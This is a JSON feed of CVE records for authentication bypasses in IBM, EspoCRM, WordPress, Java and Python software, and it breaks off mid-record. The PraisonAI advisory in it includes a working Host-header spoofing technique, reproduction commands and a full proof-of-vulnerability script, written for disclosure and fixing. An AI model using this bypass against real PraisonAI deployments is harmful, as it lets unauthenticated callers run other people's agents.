{"success":true,"data":{"threats":[{"id":"f284fdaf-8369-4d5e-b252-2bec7215c312","slug":"cve-2026-19494","externalId":"CVE-2026-19494","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-19494 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote authenticated attacker to …","description":"IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote authenticated attacker to bypass security restrictions due to improper authentication.","cveId":"CVE-2026-19494","cvssScore":8.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291628","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T21:17:57.340Z","addedAt":"2026-10-08T23:06:39.793Z","updatedAt":"2026-10-08T23:06:39.793Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-19494","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-19494","note":"authoritative record"}]},{"id":"7855f361-4362-4c2a-b4f8-f85581902c8a","slug":"cve-2026-19491","externalId":"CVE-2026-19491","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-19491 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote attacker to bypass authent…","description":"IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote attacker to bypass authentication due to improper authentication.","cveId":"CVE-2026-19491","cvssScore":9.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291628","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T21:17:57.070Z","addedAt":"2026-10-08T23:06:39.756Z","updatedAt":"2026-10-08T23:06:39.756Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-19491","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-19491","note":"authoritative record"}]},{"id":"1e0e97d2-2877-414e-8dcb-ea61db6c594a","slug":"cve-2026-16823","externalId":"CVE-2026-16823","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-16823 — IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote attacker to bypass securit…","description":"IBM Security Verify Access 10.0 through 10.0.9.2 and IBM Verify Identity Access 11.0 through 11.0.3 could allow a remote attacker to bypass security restrictions due to improper authentication.","cveId":"CVE-2026-16823","cvssScore":9.1,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7291628","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T21:17:56.233Z","addedAt":"2026-10-08T23:06:39.644Z","updatedAt":"2026-10-08T23:06:39.644Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-16823","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-16823","note":"authoritative record"}]},{"id":"a915caa5-a480-4573-87f1-f0337f33dcb1","slug":"cve-2026-61435","externalId":"GHSA-2gpf-2492-q9jh","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: Call API localhost-only authentication bypass via spoofed Host header","description":"# Call API localhost-only authentication bypass via spoofed Host header\n\n## Summary\n\nPraisonAI's patched `PRAISONAI_CALL_AUTH=disabled` safeguard for the n8n/call agent invocation API can be bypassed with a spoofed `Host: 127.0.0.1` header, allowing an unauthenticated network caller to list and invoke registered agents when the service is reachable and the opt-out is enabled.\n\n## Technical Details\n\nThe affected code is `src/praisonai/praisonai/api/agent_invoke.py`. `verify_token()` is used as a FastAPI dependency for the `/api/v1/agents` routes, including `POST /api/v1/agents/{agent_id}/invoke`. Current code no longer unconditionally skips authentication when `PRAISONAI_CALL_AUTH=disabled`; it tries to allow that opt-out only for localhost binding:\n\n```python\n_LOCALHOST_HOSTS = frozenset({'127.0.0.1', 'localhost', '::1'})\n\ndef _bind_host_from_request(request: Request) -> str:\n    host = getattr(getattr(request, 'url', None), 'hostname', None)\n    return host or os.getenv('PRAISONAI_CALL_BIND_HOST', '127.0.0.1')\n\nasync def verify_token(request: Request, authorization: Optional[str] = Header(None)) -> None:\n    if _call_auth_disabled():\n        bind_host = _bind_host_from_request(request)\n        if bind_host not in _LOCALHOST_HOSTS:\n            raise HTTPException(\n                status_code=503,\n                detail=\"PRAISONAI_CALL_AUTH=disabled is only permitted for localhost binding\",\n            )\n        return\n```\n\nThe violated invariant is that \"localhost binding\" must be a server-owned startup or socket property. The implementation instead reads `request.url.hostname`, which is derived from the HTTP Host header for the current request. A remote caller can therefore send `Host: 127.0.0.1` and make the disabled-auth guard believe the request is for a localhost-bound service.\n\nThe protected sink is agent execution. After `verify_token()` returns, `invoke_agent()` retrieves the registered agent and calls `agent.astart(request.message)` or `agent.start(request.message)`. The same router is mounted by the PraisonAI serve feature, which imports `praisonai.api.agent_invoke`, includes `agent_invoke.router`, and registers YAML agents into the same registry.\n\nThis is not a default-configuration exposure claim. The deployment must enable `PRAISONAI_CALL_AUTH=disabled` and the API must be reachable over the network. The issue is that the patched safeguard intended to constrain that opt-out to localhost can be bypassed by client-controlled request metadata.\n\n## PoV\n\nthe PoV builds an in-process FastAPI app with the real `agent_invoke.router`, registers a harmless stub agent, and sends three no-token requests. The important input is the final request: it is modeled as an external client but sends `Host: 127.0.0.1`.\n\n```python\ndisabled_client = TestClient(app, base_url=\"http://external.example\")\n\nexternal_host = disabled_client.get(\n    \"/api/v1/agents\",\n    headers={\"host\": \"external.example\"},\n)\nspoofed_localhost_list = disabled_client.get(\n    \"/api/v1/agents\",\n    headers={\"host\": \"127.0.0.1\"},\n)\nspoofed_localhost_invoke = disabled_client.post(\n    \"/api/v1/agents/pov-agent/invoke\",\n    headers={\"host\": \"127.0.0.1\"},\n    json={\"message\": \"host-header-bypass\"},\n)\n```\n\nExpected secure behavior is for both no-token requests in disabled-auth mode to be rejected when the service is not actually loopback-only. Actual behavior rejects `Host: external.example` with `503`, but accepts the spoofed localhost Host with `200` and invokes the stub agent.\n\nThe complete PoV script is in Appendix A.\n\n## PoC\n\nRun from a PraisonAI checkout with the Appendix A script saved as `pov_call_auth_host_spoof.py`:\n\n```bash\ngit checkout v4.6.62\nuv run --with fastapi --with httpx python pov_call_auth_host_spoof.py .\n```\n\nObserved `v4.6.62` output:\n\n```json\n{\n  \"disabled_auth_external_host_status\": 503,\n  \"disabled_auth_spoofed_localhost_invoke_status\": 200,\n  \"disabled_auth_spoofed_localhost_list_status\": 200,\n  \"fail_closed_without_token_status\": 503,\n  \"repo_head\": \"2a855c470077c7d2e2479a575f7ef7f548d51c33\",\n  \"spoofed_localhost_invoke_body\": {\n    \"metadata\": {\n      \"agent_id\": \"pov-agent\",\n      \"message_length\": 18,\n      \"response_length\": 33\n    },\n    \"result\": \"stub-agent-ran:host-header-bypass\",\n    \"session_id\": \"default\",\n    \"status\": \"success\"\n  },\n  \"stub_agent_calls\": [\n    \"host-header-bypass\"\n  ],\n  \"vulnerable\": true\n}\n```\n\nRun the same script against current main:\n\n```bash\ngit checkout 846568c7a5d8ce9e71e56e4c213f027c04909753\nuv run --with fastapi --with httpx python pov_call_auth_host_spoof.py .\n```\n\nObserved current-head output:\n\n```json\n{\n  \"disabled_auth_external_host_status\": 503,\n  \"disabled_auth_spoofed_localhost_invoke_status\": 200,\n  \"disabled_auth_spoofed_localhost_list_status\": 200,\n  \"fail_closed_without_token_status\": 503,\n  \"repo_head\": \"846568c7a5d8ce9e71e56e4c213f027c04909753\",\n  \"spoofed_localhost_invoke_body\": {\n    \"metadata\": {\n      \"agent_id\": \"pov-agent\",\n      \"message_length\": 18,\n      \"response_length\": 33\n    },\n    \"result\": \"stub-agent-ran:host-header-bypass\",\n    \"session_id\": \"default\",\n    \"status\": \"success\"\n  },\n  \"stub_agent_calls\": [\n    \"host-header-bypass\"\n  ],\n  \"vulnerable\": true\n}\n```\n\nThe negative controls are the first two status fields. With default authentication and no token, the API fails closed with `503`. With `PRAISONAI_CALL_AUTH=disabled`, an ordinary external Host is also rejected with `503`. Only the spoofed localhost Host passes the guard and reaches agent execution.\n\n## Impact\n\nAn unauthenticated caller who can reach a PraisonAI call/serve API with `PRAISONAI_CALL_AUTH=disabled` can bypass the intended localhost-only restriction by setting `Host: 127.0.0.1`. The PoV demonstrates both agent listing and direct invocation of a registered agent through `/api/v1/agents/{agent_id}/invoke`.\n\nImpact depends on the registered agents. In realistic deployments, agents may have tools, private context, workflow integrations, browser/file/API access, or paid model access. The same dependency also protects other agent registry routes, so the bypass undermines the access-control boundary for the mounted `/api/v1/agents` API family.\n\nSuggested CWE: `CWE-287` Improper Authentication and `CWE-346` Origin Validation Error, with `CWE-306` Missing Authentication for Critical Function also applicable to the bypassed protected action.\n\nSuggested CVSS v3.1: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N` (8.2). Confidentiality is scored Low because the PoV proves agent listing and invocation; higher confidentiality impact depends on deployed agents and their private context.\n\n## Suggested Fix\n\nDo not derive bind safety from `Request.url`, the HTTP Host header, or any request-header-derived value. If `PRAISONAI_CALL_AUTH=disabled` remains supported, decide whether it is allowed at startup from server-owned configuration, such as the actual configured bind host passed to Uvicorn or the serving command, and refuse to start in disabled-auth mode when the configured bind host is not loopback.\n\nConsider removing the HTTP auth opt-out entirely for network routes, or replacing it with an explicit local-development mode that is only available when the process is bound to `127.0.0.1`, `localhost`, or `::1`.\n\nRegression tests should exercise real ASGI requests rather than only synthetic request objects. Include a test where `PRAISONAI_CALL_AUTH=disabled`, the modeled server configuration is non-loopback, and the request sends `Host: 127.0.0.1`; the expected result should be rejection before any agent list or invoke handler runs.\n\n## Affected Package/Versions\n\nAffected package: `praisonai` on PyPI.\n\nConfirmed affected:\n\n- `v4.6.62` at `2a855c470077c7d2e2479a575f7ef7f548d51c33`\n- current main at `846568c7a5d8ce9e71e56e4c213f027c04909753`, version file still reporting `4.6.62`\n\n`v4.6.60` had the older unconditional `PRAISONAI_CALL_AUTH=disabled` bypass and is covered by a different public advisory. This report is for the patched guard shape present in `v4.6.62` and current main. If `v4.6.61` contains the same Host-derived guard, the affected lower bound likely starts there, but I could not confirm that tag locally.\n\nFixed version: unknown.\n\n## Advisory History\n\nI checked the repository advisory list available through GitHub and found adjacent but distinct advisories:\n\n- `GHSA-86qc-r5v2-v6x6`: call server unauthenticated agent listing/invocation/deletion when `CALL_SERVER_TOKEN` is unset in older releases. Current code fails closed when no token is configured; this report requires the patched `PRAISONAI_CALL_AUTH=disabled` localhost guard and a spoofed Host header.\n- `GHSA-8ccj-p46r-jwqq`: `PRAISONAI_CALL_AUTH=disabled` unconditionally disabled authentication in older releases and is listed as patched in `>= 4.6.61`. This report shows `v4.6.62` and current main are still bypassable through the new guard because the guard trusts `request.url.hostname`.\n- `GHSA-vmf9-xx9w-86wx`: legacy SSE MCP transport accepts attacker Host/Origin and exposes registered tools through `praisonaiagents.mcp.ToolsMCPServer.run_sse()`, `/sse`, and `/messages/`. That advisory affects `praisonaiagents >= 0.6.0, < 1.6.58` and `praisonai >= 3.10.0, < 4.6.58`, with patches listed as `praisonaiagents >= 1.6.59` and `praisonai >= 4.6.59`. This report targets a different package call path in `praisonai.api.agent_invoke.verify_token()` and `/api/v1/agents/{agent_id}/invoke`, confirmed in `praisonai v4.6.62` and current main after the GHSA-vmf9 patched range. The preconditions are also different: GHSA-vmf9 is a browser/DNS-rebinding style Host/Origin issue against a local or internal legacy SSE MCP server, while this report requires `PRAISONAI_CALL_AUTH=disabled` on the call/n8n agent API and bypasses its localhost-only opt-out guard with `Host: 127.0.0.1`; no browser Origin, DNS rebinding setup, SSE transport, or MCP tool server is involved.\n- `GHSA-x8cv-xmq7-p8xp`: `AgentTeam.launch()` unauthenticated API. That advisory covers `praisonaiagents` `AgentTeam.launch()` routes, not `praisonai.api.agent_invoke.verify_token()`.\n- `GHSA-5qw8-f2g9-ff29`: Recipe server Typer command bypasses a non-localhost authentication guard. That is a different server and CLI path. This report targets the call API's Host-derived guard input.\n\nNo advisory I found describes Host-header spoofing against the patched `PRAISONAI_CALL_AUTH=disabled` localhost guard in `praisonai.api.agent_invoke`.\n\n## References\n\n- `src/praisonai/praisonai/api/agent_invoke.py`\n- `src/praisonai/praisonai/cli/features/serve.py`\n- `GHSA-86qc-r5v2-v6x6`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-86qc-r5v2-v6x6\n- `GHSA-8ccj-p46r-jwqq`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8ccj-p46r-jwqq\n- `GHSA-vmf9-xx9w-86wx`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vmf9-xx9w-86wx\n- `GHSA-x8cv-xmq7-p8xp`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x8cv-xmq7-p8xp\n- `GHSA-5qw8-f2g9-ff29`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-5qw8-f2g9-ff29\n\n## Appendix A - Full PoV Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"PoV for PraisonAI call API Host-header localhost guard bypass.\"\"\"\n\nfrom __future__ import annotations\n\nimport importlib\nimport json\nimport os\nimport sys\nfrom pathlib import Path\nfrom typing import Any\n\n\ndef _repo_root() -> Path:\n    if len(sys.argv) == 2:\n        return Path(sys.argv[1]).resolve()\n    return Path.cwd().resolve()\n\n\ndef _load_agent_invoke(repo_root: Path, auth_disabled: bool):\n    os.environ.pop(\"CALL_SERVER_TOKEN\", None)\n    if auth_disabled:\n        os.environ[\"PRAISONAI_CALL_AUTH\"] = \"disabled\"\n    else:\n        os.environ.pop(\"PRAISONAI_CALL_AUTH\", None)\n\n    package_root = repo_root / \"src\" / \"praisonai\"\n    if not package_root.exists():\n        raise SystemExit(f\"missing PraisonAI package root: {package_root}\")\n    package_root_s = str(package_root)\n    if package_root_s not in sys.path:\n        sys.path.insert(0, package_root_s)\n\n    import praisonai.api.agent_invoke as agent_invoke\n\n    agent_invoke = importlib.reload(agent_invoke)\n    agent_invoke._agent_registry.clear()\n    return agent_invoke\n\n\nclass StubAgent:\n    def __init__(self) -> None:\n        self.calls: list[str] = []\n\n    def start(self, message: str) -> str:\n        self.calls.append(message)\n        return f\"stub-agent-ran:{message}\"\n\n\ndef _make_client(agent_invoke: Any):\n    from fastapi import FastAPI\n    from fastapi.testclient import TestClient\n\n    app = FastAPI()\n    app.include_router(agent_invoke.router)\n    return TestClient(app, base_url=\"http://external.example\")\n\n\ndef main() -> int:\n    repo_root = _repo_root()\n\n    fail_closed_mod = _load_agent_invoke(repo_root, auth_disabled=False)\n    fail_closed_client = _make_client(fail_closed_mod)\n    fail_closed = fail_closed_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"127.0.0.1\"},\n    )\n\n    disabled_mod = _load_agent_invoke(repo_root, auth_disabled=True)\n    agent = StubAgent()\n    disabled_mod.register_agent(\"pov-agent\", agent)\n    disabled_client = _make_client(disabled_mod)\n\n    external_host = disabled_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"external.example\"},\n    )\n    spoofed_localhost_list = disabled_client.get(\n        \"/api/v1/agents\",\n        headers={\"host\": \"127.0.0.1\"},\n    )\n    spoofed_localhost_invoke = disabled_client.post(\n        \"/api/v1/agents/pov-agent/invoke\",\n        headers={\"host\": \"127.0.0.1\"},\n        json={\"message\": \"host-header-bypass\"},\n    )\n\n    result = {\n        \"repo_head\": _git(repo_root, \"rev-parse\", \"HEAD\"),\n        \"fail_closed_without_token_status\": fail_closed.status_code,\n        \"disabled_auth_external_host_status\": external_host.status_code,\n        \"disabled_auth_spoofed_localhost_list_status\": spoofed_localhost_list.status_code,\n        \"disabled_auth_spoofed_localhost_invoke_status\": spoofed_localhost_invoke.status_code,\n        \"spoofed_localhost_invoke_body\": _safe_json(spoofed_localhost_invoke),\n        \"stub_agent_calls\": agent.calls,\n    }\n\n    expected = (\n        fail_closed.status_code == 503\n        and external_host.status_code == 503\n        and spoofed_localhost_list.status_code == 200\n        and spoofed_localhost_invoke.status_code == 200\n        and agent.calls == [\"host-header-bypass\"]\n    )\n    result[\"vulnerable\"] = expected\n    print(json.dumps(result, indent=2, sort_keys=True))\n    return 0 if expected else 1\n\n\ndef _safe_json(response: Any) -> Any:\n    try:\n        return response.json()\n    except Exception:\n        return response.text\n\n\ndef _git(repo_root: Path, *args: str) -> str:\n    import subprocess\n\n    return subprocess.check_output(\n        [\"git\", \"-C\", str(repo_root), *args],\n        text=True,\n        stderr=subprocess.DEVNULL,\n    ).strip()\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main())\n```","cveId":"CVE-2026-61435","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N","severity":"high","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-287","CWE-306","CWE-346"],"tags":["osv","osv:ghsa-2gpf-2492-q9jh","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-2gpf-2492-q9jh","type":"advisory","title":"OSV GHSA-2gpf-2492-q9jh"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2gpf-2492-q9jh","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61435","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62174","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/2a855c470077c7d2e2479a575f7ef7f548d51c33","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/846568c7a5d8ce9e71e56e4c213f027c04909753","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-authentication-bypass-via-host-header-spoofing","type":"other","title":"OSV web"}],"epssScore":0.00685,"epssPercentile":0.51118,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:36:26.000Z","addedAt":"2026-10-08T21:08:30.957Z","updatedAt":"2026-10-08T21:08:30.957Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61435","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61435","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-2gpf-2492-q9jh"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-2gpf-2492-q9jh"}]},{"id":"a1966877-758a-454c-858e-959cc2a784ef","slug":"cve-2026-14502","externalId":"CVE-2026-14502","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-14502 — IBM DataPower Gateway 10.5.0.0 through 10.5.0.22, 10.6.1 through 10.6.6, 10.6.0.0 through 10.6.0.10, and 11.0.0.0 through 11.0.0.2 could allow a re…","description":"IBM DataPower Gateway 10.5.0.0 through 10.5.0.22, 10.6.1 through 10.6.6, 10.6.0.0 through 10.6.0.10, and 11.0.0.0 through 11.0.0.2 could allow a remote attacker to obtain administrative access due to failure to reject empty passwords during LDAP authentication.","cveId":"CVE-2026-14502","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://www.ibm.com/support/pages/node/7289775","type":"advisory","title":"psirt@us.ibm.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T15:17:49.150Z","addedAt":"2026-10-08T16:39:35.902Z","updatedAt":"2026-10-08T21:05:50.363Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-14502","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-14502","note":"authoritative record"}]},{"id":"99d4eae7-9f9e-44a3-b62b-9fbdc94a352a","slug":"cve-2026-105832","externalId":"CVE-2026-105832","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105832 — EspoCRM before 10.0.6 contains an authentication bypass vulnerability that accepts a login stopped at the second factor on routes not requiring aut…","description":"EspoCRM before 10.0.6 contains an authentication bypass vulnerability that accepts a login stopped at the second factor on routes not requiring authentication. Attackers knowing a 2FA-enabled user's username and password can skip the second factor to read config parameters not exposed publicly.","cveId":"CVE-2026-105832","cvssScore":5.3,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/espocrm/espocrm/security/advisories/GHSA-ph8v-hvf5-wgp9","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/espocrm-before-10.0.6-two-factor-authentication-bypass-on-unauthenticated-routes","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":null,"epssPercentile":null,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T15:17:35.697Z","addedAt":"2026-10-08T16:39:35.718Z","updatedAt":"2026-10-08T16:39:35.718Z","epssUpdatedAt":null,"nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105832","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105832","note":"authoritative record"}]},{"id":"227d370e-9589-479b-a2f3-5491fedd1e4c","slug":"cve-2026-103646","externalId":"CVE-2026-103646","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-103646 — The Ultimate Multisite  WordPress plugin before 2.17.0 does not require authentication before a logged-out checkout is linked to, and logged in as,…","description":"The Ultimate Multisite  WordPress plugin before 2.17.0 does not require authentication before a logged-out checkout is linked to, and logged in as, an existing WordPress account matching the submitted email address, and its duplicate-account check normalizes that address differently from the lookup used to create the customer, so an unauthenticated attacker can log in as any existing user, including a Network Super Admin, whose email address they know.\nThis bypass is not addressed by the 2.15.1 fix for CVE-2026-75957 and remains exploitable in all versions up to and including 2.16.1, the releases that fix was expected to cover. Exploitation requires a checkout form configured without a password field (auto-generated password) and a target account that has no existing customer record in the Ultimate Multisite  WordPress plugin before 2.17.0.","cveId":"CVE-2026-103646","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-287"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://wpscan.com/vulnerability/a05da0ad-5d92-406f-b182-b3ed1f8389f3/","type":"advisory","title":"contact@wpscan.com"}],"epssScore":0.00198,"epssPercentile":0.08825,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T06:16:37.957Z","addedAt":"2026-10-08T06:39:29.606Z","updatedAt":"2026-10-08T21:05:46.699Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-103646","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-103646","note":"authoritative record"}]},{"id":"7a469106-8ea7-492e-ba33-e593f4bb94b1","slug":"cve-2026-107228","externalId":"CVE-2026-107228","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-107228 — The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses.","description":"The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.1.0 until 3.0.14, the enabled-by-default cookie store replaces a Cookie header explicitly supplied through setHeader or addHeader whenever the store contributes any cookie for the origin. In a shared client, stored cookies originating from one user can replace a different user's request cookie, causing the request to execute under the wrong session. This bypasses the earlier CVE-2024-53990 remediation, which covered cookies supplied through addCookie but not a directly supplied header. This issue is fixed in version 3.0.14.","cveId":"CVE-2026-107228","cvssScore":6.8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N","severity":"medium","vendor":"Maven","product":"org.asynchttpclient:async-http-client","affectedVersions":["pkg:maven/org.asynchttpclient/async-http-client >= 3.0.0, < 3.0.14","pkg:maven/org.asynchttpclient/async-http-client >= 2.1.0, <= 2.16.1"],"cwes":["CWE-287"],"tags":["nvd","status:received","osv","osv:ghsa-2jwh-9rmr-j4xf","ecosystem:maven","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/AsyncHttpClient/async-http-client/commit/fd9763620725126c1c8bb0af1ceb9a7523099a5f","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/releases/tag/async-http-client-project-3.0.14","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/AsyncHttpClient/async-http-client/security/advisories/GHSA-2jwh-9rmr-j4xf","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-2jwh-9rmr-j4xf","type":"advisory","title":"OSV GHSA-2jwh-9rmr-j4xf"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107228","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/AsyncHttpClient/async-http-client","type":"vendor","title":"OSV package"}],"epssScore":0.00301,"epssPercentile":0.20897,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-07T21:17:14.457Z","addedAt":"2026-10-07T22:39:36.533Z","updatedAt":"2026-10-08T21:05:43.958Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107228","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-107228","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-2JWH-9RMR-J4XF"}]},{"id":"ddb9eb27-7691-49be-bceb-0abfc726be7c","slug":"cve-2026-46437","externalId":"CVE-2026-46437","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-46437 — wger is a free, open-source workout and fitness manager.","description":"wger is a free, open-source workout and fitness manager. Versions prior to 2.6 have a vulnerability in the authentication/session lifecycle of `wger` where bearer-style API credentials remain valid after a user logs out and after a user changes their password. An attacker who steals a victim’s DRF authtoken (`Authorization: Token ...`) or JWT refresh token can continue to access protected `/api/v2/*` endpoints until the token is manually rotated/deleted (DRF token) or naturally expires (JWT refresh). Version 2.6 contains a patch.","cveId":"CVE-2026-46437","cvssScore":4.8,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","severity":"medium","vendor":"PyPI","product":"wger","affectedVersions":["pkg:pypi/wger <= 